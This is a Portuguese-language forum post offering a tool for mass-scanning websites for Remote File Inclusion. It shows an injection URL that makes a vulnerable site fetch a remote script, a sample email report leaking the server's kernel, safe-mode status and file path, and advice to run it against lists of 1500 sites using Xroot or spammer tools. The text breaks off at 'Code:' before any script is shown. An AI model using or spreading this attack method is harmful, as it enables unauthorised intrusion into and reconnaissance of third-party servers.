Pode ser usada em Bot Scanner, Xroot e outros programas que simulação alguma requisição http assim injetando o script na URL. já testa e envia pro Email.
Quem já usou o Xroot sabe como usar, Ou até mesmo um simples script de Spammer.
Exemplo:http://www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?
Chegara da seguinte forma no seu email:
Nome: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64
Safe Mode:Off
URL: www.sitevul.com.br/index.php?id=http://script.com/RFI.txt?
Data: 07-31-33, 27-08-12, 3131 3133 1 Monpm12 239
Caminho: /home/sitevull/public_html/index.php
System: Linux a1-whl-a79.host.teste 2.6.18-194.32.1.el5 #1 SMP Fri Jan 7 11:50:24 BRST 2011 x86_64
Imagina testar isso um por um com lista de 1500 sites.
Dica use o Xroot ou outro programa que simule uma requisição HTTP pra injetar o script na Get do site:
OBS: procure a variável chamada Email troque o valor fixo que seria meu Email pelo seu.
Script Para teste RFI vulneráveis enviados para Email
Code: